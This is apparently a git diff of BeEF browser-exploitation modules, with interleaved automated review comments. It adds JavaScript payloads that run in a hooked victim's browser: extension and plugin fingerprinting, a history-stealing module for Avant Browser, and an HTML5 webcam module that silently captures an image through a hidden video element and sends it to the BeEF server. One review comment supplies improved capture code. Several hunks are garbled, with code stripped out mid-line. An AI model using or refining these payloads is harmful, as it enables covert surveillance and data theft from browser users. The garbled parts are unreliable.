+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ avant_steal_history:
+ enable: true
+ category: "Browser"
+ name: "Get Visited URLs (Avant Browser)"
+ description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.

Note: Avant Browser in Firefox engine mode only."
+ authors: ["Roberto Suggi Liverani"]
+ target:
+ working: ["FF"]
diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/browser/avant_steal_history/module.rb
similarity index 63%
rename from modules/exploits/zenoss_daemon_csrf/config.yaml
rename to modules/browser/avant_steal_history/module.rb
index 923946d5d..1d0692b76 100644
--- a/modules/exploits/zenoss_daemon_csrf/config.yaml
+++ b/modules/browser/avant_steal_history/module.rb
@@ -13,13 +13,21 @@
 # See the License for the specific language governing permissions and
 # limitations under the License.
 #
-beef:
- module:
- zenoss_daemon_csrf:
- enable: true
- category: "Exploits"
- name: "Zenoss <= 3.2.1 Daemon CSRF"
- description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server."
- authors: ["bcoles"]
- target:
- working: ["ALL"]
+class Avant_steal_history < BeEF::Core::Command
+
+ def self.options
+
+ configuration = BeEF::Core::Configuration.instance
+
+
+ return [
+ {'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
+ ]
+
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/browser/browser_fingerprinting/command.js b/modules/browser/browser_fingerprinting/command.js
index 3f9012df6..20a959d08 100644
--- a/modules/browser/browser_fingerprinting/command.js
+++ b/modules/browser/browser_fingerprinting/command.js
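Review bot: `configuration = BeEF::Core::Configuration.instance` in `self.options` is assigned and never read; drop that line together with the stray blank lines around the `return`. The `cId` option holds a single numeric command id but is declared as `'type' => 'textarea'`, so a `'text'` input is presumably what was intended. Git has paired this new file with the deleted zenoss_daemon_csrf config by similarity, which is harmless but makes the rename record misleading.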
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var browser_type = new Array;
@@ -43,7 +34,12 @@ beef.execute(function() {
 new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
 new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
 new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
+ new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
+ new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
+ new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
+ new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
 new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
+ new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
 new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")
 );
diff --git a/modules/browser/browser_fingerprinting/config.yaml b/modules/browser/browser_fingerprinting/config.yaml
index 0e9c2ea94..475be130e 100644
--- a/modules/browser/browser_fingerprinting/config.yaml
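Review bot: The new `new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png")` row is placed directly above the existing `"7+"` row, so on IE 7–9 both probes presumably succeed and the version label that ends up reported depends on which resource finishes loading first; if the intent was to narrow the match, the `"7+"` row needs a non-overlapping range or a comment explaining how the two interact. As a matter of style the table would read more easily as array literals, `["Firefox","9+","..."]`, than as nested `new Array(...)` calls. The enclosing `beef.execute` callback starts before this hunk.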
+++ b/modules/browser/browser_fingerprinting/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/browser_fingerprinting/module.rb b/modules/browser/browser_fingerprinting/module.rb
index ad2157d29..e270a3143 100644
--- a/modules/browser/browser_fingerprinting/module.rb
+++ b/modules/browser/browser_fingerprinting/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # Uses methods described here:
 # http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
diff --git a/modules/browser/detect_activex/command.js b/modules/browser/detect_activex/command.js
new file mode 100644
index 000000000..5db6fc0f1
--- /dev/null
+++ b/modules/browser/detect_activex/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var result = (beef.browser.hasActiveX())? "Yes" : "No";
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "activex="+result);
+
+});
+
diff --git a/modules/browser/detect_activex/config.yaml b/modules/browser/detect_activex/config.yaml
new file mode 100644
index 000000000..cacbda562
--- /dev/null
+++ b/modules/browser/detect_activex/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_activex:
+ enable: true
+ category: "Browser"
+ name: "Detect ActiveX"
+ description: "This module will check if the browser has ActiveX support."
+ authors: ["bcoles"]
+ target:
+ user_notify: ["IE"]
+ not_working: ["All"]
diff --git a/modules/browser/detect_activex/module.rb b/modules/browser/detect_activex/module.rb
new file mode 100644
index 000000000..29ffcf708
--- /dev/null
+++ b/modules/browser/detect_activex/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_activex < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['activex'] = @datastore['activex']
+ save content
+ end
+
+end
diff --git a/modules/browser/detect_default_browser/command.js b/modules/browser/detect_default_browser/command.js
new file mode 100644
index 000000000..2a5e566db
--- /dev/null
+++ b/modules/browser/detect_default_browser/command.js
@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Written by unsticky
+// Ported to BeEF by bcoles
+// For more information see http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
+
+beef.execute(function() {
+
+ var mt = document.mimeType;
+
+ if (mt) {
+ if (mt == "Safari Document") result = "Safari";
+ if (mt == "Firefox HTML Document") result = "Firefox";
+ if (mt == "Chrome HTML Document") result = "Chrome";
+ if (mt == "HTML Document") result = "Internet Explorer";
+ if (mt == "Opera Web Document") result = "Opera";
+ } else {
+ result = "Unknown";
+ }
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser="+result);
+
+});
+
diff --git a/modules/browser/detect_default_browser/config.yaml b/modules/browser/detect_default_browser/config.yaml
new file mode 100644
index 000000000..80655bc8b
--- /dev/null
+++ b/modules/browser/detect_default_browser/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_default_browser:
+ enable: true
+ category: "Browser"
+ name: "Detect Default Browser"
+ description: "This module detects which browser is configured as the default web browser."
+ authors: ["unsticky", "bcoles"]
+ target:
+ working: ["IE"]
+ not_working: ["All"]
diff --git a/modules/browser/detect_default_browser/module.rb b/modules/browser/detect_default_browser/module.rb
new file mode 100644
index 000000000..88233ad01
--- /dev/null
+++ b/modules/browser/detect_default_browser/module.rb
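Review bot: `result` is never declared, so each assignment in this hunk writes an implicit global on the hooked page's window, and when `mt` is truthy but matches none of the five strings `result` is left unset and `"browser="+result` reports the string `undefined`. Declare it with the fallback up front, `var result = "Unknown";`, and let the `else` branch go; the comparisons should also use `===`.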
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_default_browser < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['browser'] = @datastore['browser'] if not @datastore['browser'].nil?
+ save content
+ end
+
+end
diff --git a/modules/chrome_extensions/get_chrome_extensions/command.js b/modules/browser/detect_extensions/command.js
similarity index 92%
rename from modules/chrome_extensions/get_chrome_extensions/command.js
rename to modules/browser/detect_extensions/command.js
index 49a38a176..1ae81109d 100644
--- a/modules/chrome_extensions/get_chrome_extensions/command.js
+++ b/modules/browser/detect_extensions/command.js
@@ -1,21 +1,12 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
- extensions = new Array(
+ chrome_extensions = new Array(
 new Array("blpcfgokakmgnkcojhhkbfbldkacnbeo","YouTube"),
 new Array("pjkljhegncpnkpknbcohdijeoejaedia","Gmail"),
 new Array("coobgpohoikkiipiblmjeljniedjpjpf","Google Search"),
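Review bot: The rename to `chrome_extensions` keeps the table an implicit global: the new line is `chrome_extensions = new Array(` with no `var`, so the thousand-entry array is attached to the hooked page's window object and outlives the `beef.execute` callback. Declare it locally, `var chrome_extensions = new Array(`, so it is scoped to the function; the closing `);` of the array lies outside this hunk.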
@@ -1018,7 +1009,61 @@ beef.execute(function() {
 new Array("inolmjbojghkehmmlbdmpdlmagalddni","Jagran - India No.1 Hindi News Daily")
 );
- var detect = function(addon_id, addon_name) {
+ var firefox_extensions = {
+ "Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
+ "Auto Copy" : "chrome://autocopy/skin/autocopy.png",
+ "ColorZilla" : "chrome://colorzilla/skin/logo.png",
+ "Customize Google" : "chrome://customizegoogle/skin/32x32.png",
+ "DownThemAll!" : "chrome://dta/content/immagini/icon.png",
+ "Faster Fox" : "chrome://fasterfox/skin/icon.png",
+ "Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
+ "FlashGot" : "chrome://flashgot/skin/icon32.png",
+ "Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
+ "Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
+ "Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
+ "IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
+ "IE View" : "chrome://ieview/skin/ieview-icon.png",
+ "JS View" : "chrome://jsview/skin/jsview.gif",
+ "Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
+ "MeasureIt" : "chrome://measureit/skin/measureit.png",
+ "SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
+ "SEOpen" : "chrome://seopen/skin/seopen.png",
+ "Search Status" : "chrome://searchstatus/skin/cax10.png",
+ "Server Switcher" : "chrome://switcher/skin/icon.png",
+ "StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
+ "Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
+ "Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
+ "User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
+ "View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
+ "Web Developer" : "chrome://webdeveloper/content/images/logo.png",
+ "Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
+ "UrlParams" : "chrome://urlparams/skin/urlparams32.png",
+ "NewsFox" : "chrome://newsfox/skin/images/home.png",
+ "Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
+ "GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
+ "QuickJava" : "chrome://quickjava/content/js.png",
+ "Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
+ "BBCode" : "chrome://bbcode/skin/bbcode.png",
+ "BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
+ "ConQuery" : "chrome://conquery/skin/conquery.png",
+ "Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
+ "Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
+ "FireBug" : "chrome://firebug/content/firebug32.png",
+ "FoxyTunes" : "chrome://foxytunes/skin/logo.png",
+ "MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
+ "SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
+ "spooFX" : "chrome://spoofx/skin/main/spoofx.png",
+ "Statusbar Clock" : "chrome://timestatus/skin/icon.png",
+ "Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
+ "UnPlug" : "chrome://unplug/skin/unplug.png",
+ "View Source Chart" : "chrome://vrs/skin/vrssmall.png",
+ "XPather" : "chrome://xpather/content/iconka.png",
+ "WOT" : "chrome://wot/skin/fusion/logo.png",
+ "LastPass" : "chrome://lastpass/skin/vaultdelete.png",
+
+ };
+
+ var detect_chrome_extension = function(addon_id, addon_name) {
 var s = document.createElement('script');
 s.onload = function() {
 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'extension='+addon_name);
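Review bot: `"Adblock Filterset.G Updater"` and `"UnPlug"` both map to `chrome://unplug/skin/unplug.png`, so one successful image load reports both extensions as installed; the first entry needs a resource of its own or should be dropped. The object literal also ends with a trailing comma after the `"LastPass"` entry followed by an empty line inside the braces, which JScript in IE 8 and earlier rejects as a syntax error — remove the comma. The enclosing `beef.execute` callback starts before this hunk and continues after it.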
@@ -1027,11 +1072,38 @@ beef.execute(function() { document.body.appendChild(s); } - try { - for (var i=0; i', <%= @command_id %>, 'extension=" + addon_name+ "');"); + img.setAttribute("src", addon_url); + } + + if(beef.browser.isC()) { + try { + for (var i=0; i', <%= @command_id %>, 'fail=detecting Chrome extensions failed'); + } + } else if(beef.browser.isFF()) { + try { + for (var i in firefox_extensions) { + detect_firefox_extension(firefox_extensions[i], i); + } + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Firefox extensions failed'); + } + } else if(beef.browser.isIE()) { + try { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions is not supported'); + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=detecting Internet Explorer extensions failed'); + } + } }); diff --git a/modules/browser/detect_extensions/config.yaml b/modules/browser/detect_extensions/config.yaml new file mode 100644 index 000000000..1f717b7a1 --- /dev/null +++ b/modules/browser/detect_extensions/config.yaml @@ -0,0 +1,22 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_extensions: + enable: true + category: "Browser" + name: "Detect Extensions" + description: "This module detects extensions installed in Google Chrome and Mozilla Firefox." + authors: ["koto", "bcoles", "nbblrr"] + target: + working: + FF: + min_ver: 1 + max_ver: latest + C: + min_ver: 1 + max_ver: 18 + not_working: ["All"] diff --git a/modules/browser/detect_extensions/module.rb b/modules/browser/detect_extensions/module.rb new file mode 100644 index 000000000..2e8b4bf0f --- /dev/null +++ b/modules/browser/detect_extensions/module.rb 
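Review bot: The `beef.browser.isIE()` branch wraps a single `beef.net.send(..., 'fail=detecting Internet Explorer extensions is not supported')` in a try/catch whose handler only sends a second failure message; the try/catch adds nothing there and the branch can be reduced to the one send. The Firefox loop `for (var i in firefox_extensions)` walks every enumerable property, so if the hooked page has extended `Object.prototype` those keys are passed to `detect_firefox_extension` as well; guard with `if (!firefox_extensions.hasOwnProperty(i)) continue;` or iterate `Object.keys(firefox_extensions)`. The Chrome loop and `detect_firefox_extension` body appear garbled in this rendering of the diff (the `<` comparison was stripped), so they were not reviewed.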
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# More info:
+# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
+# http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
+#
+class Detect_extensions < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['extension'] = @datastore['extension']
+ save content
+ end
+
+end
+
diff --git a/modules/browser/detect_firebug/command.js b/modules/browser/detect_firebug/command.js
index 6887c3554..df9070739 100644
--- a/modules/browser/detect_firebug/command.js
+++ b/modules/browser/detect_firebug/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var result = "Not in use or not installed";
 if (window.console && (window.console.firebug || window.console.exception)) result = "Enabled and in use!";
diff --git a/modules/browser/detect_firebug/config.yaml b/modules/browser/detect_firebug/config.yaml
index 50f54194b..e62499339 100644
--- a/modules/browser/detect_firebug/config.yaml
+++ b/modules/browser/detect_firebug/config.yaml
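Review bot: `post_execute` stores only `@datastore['extension']`, but the command script for this module also reports `fail=...` messages from its Chrome, Firefox and IE branches, so a failure result arrives with `extension` nil and the saved row carries no information. Add `content['fail'] = @datastore['fail'] unless @datastore['fail'].nil?` before `save content`, mirroring the nil guard used in detect_default_browser's module.rb.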
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
diff --git a/modules/browser/detect_firebug/module.rb b/modules/browser/detect_firebug/module.rb
index 326d375d2..54e9fdafc 100644
--- a/modules/browser/detect_firebug/module.rb
+++ b/modules/browser/detect_firebug/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Detect_firebug < BeEF::Core::Command
diff --git a/modules/browser/detect_foxit/command.js b/modules/browser/detect_foxit/command.js
new file mode 100644
index 000000000..937e4c2a2
--- /dev/null
+++ b/modules/browser/detect_foxit/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var result = ( beef.browser.hasFoxit() )? "Yes" : "No";
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "foxit="+result);
+
+});
+
diff --git a/modules/browser/detect_foxit/config.yaml b/modules/browser/detect_foxit/config.yaml
new file mode 100644
index 000000000..5455200e1
--- /dev/null
+++ b/modules/browser/detect_foxit/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_foxit:
+ enable: true
+ category: "Browser"
+ name: "Detect Foxit Reader"
+ description: "This module will check if the browser has Foxit Reader Plugin."
+ authors: ["javuto"]
+ target:
+ working: ["All"]
diff --git a/modules/browser/detect_foxit/module.rb b/modules/browser/detect_foxit/module.rb
new file mode 100644
index 000000000..22fd07577
--- /dev/null
+++ b/modules/browser/detect_foxit/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Detect_foxit < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['foxit'] = @datastore['foxit']
+ save content
+ end
+
+end
diff --git a/modules/browser/detect_lastpass/command.js b/modules/browser/detect_lastpass/command.js
new file mode 100644
index 000000000..9486b9210
--- /dev/null
+++ b/modules/browser/detect_lastpass/command.js
@@ -0,0 +1,29 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var result = "Not in use or not installed"; + + var lpdiv = document.getElementById('hiddenlpsubmitdiv'); + if (typeof(lpdiv) != 'undefined' && lpdiv != null) { + //We've got the first detection of LP + result = "Detected LastPass through presence of the ' + var swfobject_script = '' //This is the javascript that actually calls the swfobject library to include the swf file - var include_script = ''; + var include_script = ''; //Empty body first $j('body').html(''); diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml index 69f3eb5fb..fac0f3544 100644 --- a/modules/browser/webcam/config.yaml +++ b/modules/browser/webcam/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb index de2df6639..ee1ea45f9 100644 --- a/modules/browser/webcam/module.rb +++ b/modules/browser/webcam/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # require 'base64' class Webcam < BeEF::Core::Command diff --git a/modules/browser/webcam_html5/command.js b/modules/browser/webcam_html5/command.js new file mode 100644 index 000000000..1c5dd24a8 --- /dev/null +++ b/modules/browser/webcam_html5/command.js 
@@ -0,0 +1,50 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+
+beef.execute(function() {
+ var vid_id = beef.dom.generateID();
+ var can_id = beef.dom.generateID();
+ var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
+ var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
+ $j('body').append(vid_el);
+ $j('body').append(can_el);
+
+ var ctx = can_el.getContext('2d');
+
+ var localMediaStream = null;
+
+ var cap = function() {
+ if (localMediaStream) {
+ ctx.drawImage(vid_el,0,0);
+ beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
+ } else {
+ beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
+ }
+ }
+
+ window.URL = window.URL || window.webkitURL;
+ navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
+
+ navigator.getUserMedia({video:true},function(stream) {
+ vid_el.src = window.URL.createObjectURL(stream);
+ localMediaStream = stream;
+ setTimeout(cap,2000);
+
+ }, function(err) {
+ beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
+ });
+
+
+
+
+});
+
+
+
+
+
diff --git a/modules/browser/webcam_html5/config.yaml b/modules/browser/webcam_html5/config.yaml
new file mode 100644
index 000000000..fd6762121
--- /dev/null
+++ b/modules/browser/webcam_html5/config.yaml
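Review bot: `cap` never releases the stream it captured from, so after the single frame is posted the camera stays open (and the browser's recording indicator stays lit) until the hooked page is closed, which undercuts the point of hiding the `video` element. Stopping the stream right after `toDataURL` fixes that; I used `stop()` because that was the MediaStream API of the time, with `getTracks()` as the newer form, so please confirm against the browsers you target. Separately, when none of the vendor-prefixed `getUserMedia` variants exist the call that follows throws a TypeError and BeEF never receives a result, so a guard that posts `'result=getUserMedia not supported'` and returns is needed before it. The fixed 2000 ms delay before `cap` is also a guess: on a slow device the first frame may not have rendered yet and the canvas comes back black, and waiting on the video element's `playing` or `loadedmetadata` event would be more reliable, though I have not tested that here.
```javascript
    var cap = function() {
        if (localMediaStream) {
            ctx.drawImage(vid_el,0,0);
            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
            // release the camera now that the frame has been sent
            if (typeof localMediaStream.stop == 'function') {
                localMediaStream.stop();
            } else if (typeof localMediaStream.getTracks == 'function') {
                localMediaStream.getTracks().forEach(function(t) { t.stop(); });
            }
        } else {
            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
        }
    }

    window.URL = window.URL || window.webkitURL;
    navigator.getUserMedia = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
    if (!navigator.getUserMedia) {
        beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia not supported');
        return;
    }
    // … unchanged: getUserMedia call with success/error callbacks …
```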
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ webcam_html5:
+ enable: true
+ category: "Browser"
+ name: "Webcam HTML5"
